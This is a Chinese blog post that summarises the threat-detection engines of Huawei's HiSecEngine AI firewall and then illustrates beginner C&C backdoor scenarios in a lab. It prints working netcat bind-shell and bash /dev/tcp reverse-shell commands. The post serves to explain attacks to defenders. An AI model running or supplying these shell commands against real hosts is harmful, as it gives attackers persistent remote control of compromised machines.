当前位置:   article > 正文

C&C驻点你应该知道的事

cde威胁防御引擎

最近被华为HiSecEngine[1] AI防火墙刷爆了朋友圈,它内置了三大威胁防御引擎,分别是NGE、CDE和AIE。以下是自己的理解,可能说的不对,欢迎留言讨论。

  • NGE:作为NGFW检测引擎,提供IPS、反病毒和URL过滤等内容安全相关的功能
大白话说:就是特征库检测
  • CDE:可提供数据深度分析,暴露威胁的细节,快速检测恶意文件
大白话说:就是沙箱检测
  • AIE:APT威胁检测引擎,针对暴力破解、C&C、DGA域名和加密威胁流量进行检测
大白话说:就是AI行为检测

对AIE引擎颇有兴趣,有监督的有3类:

  • 失陷主机检测:失陷后的行为比较诡异,可能C&C,也可能转移,不知道华为怎么定义?
  • C&C通道检测:失陷后为了维持权限,种下的后门程序,这是一个比较明确的突破口。
  • 加密外发检测:正在学习...

无监督的有1类:

  • 暴力破解检测:对RDP、SSH等流量进行K-Means聚类?

55e107e9170bbcc0fc5de2eeb1892e11.png

攻击矩阵:

信息收集、扫描探测、边界突破、建立驻点、权限提升、内部转移、数据盗取、数据外发。

入门级的C&C场景[2]

点个赞呗,待会来写高级部分

8f67dd9219af2f9510afd9e127bfe590.gif

场景一:失陷主机在非军事区

  • 公网服务器失陷,攻击者成功入侵后,将bash发布出去,等待控制端来连接
nc -lvvp 2019 -t -e /bin/bash

270397e5fa68ca77f0f84117e2ed8326.png
  • 攻击者控制端(103),主动连接失陷服务器(105)
nc 192.168.0.105 2019

4a47b59b34548215686951dc60cd4c0c.png
  • 此时,后门已经稳定建立了,失陷主机的2019端口一直打开着,任何人都能控制它

场景二:失陷主机在内网

  • 攻击者控制端(103)主动监听2019端口,等待失陷主机(105)来舔
nc -vlp 2019

75df9b51626d02b114a1c7f1d8132b13.png
  • 失陷主机(105)舔攻击者控制端(103)
bash -i >& /dev/tcp/192.168.0.103/2019 0>&1

4e4965e6cd7a27fb013ac4773c60bb5d.png
  • 此时,后门已经稳定建立了,失陷主机(105)与攻击者(103)一直保持着连接

带货环节:


ec76472677f5fff14db7b0ba67ef71f7.png

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/寸_铁/article/detail/872693
推荐阅读
相关标签
  

闽ICP备14008679号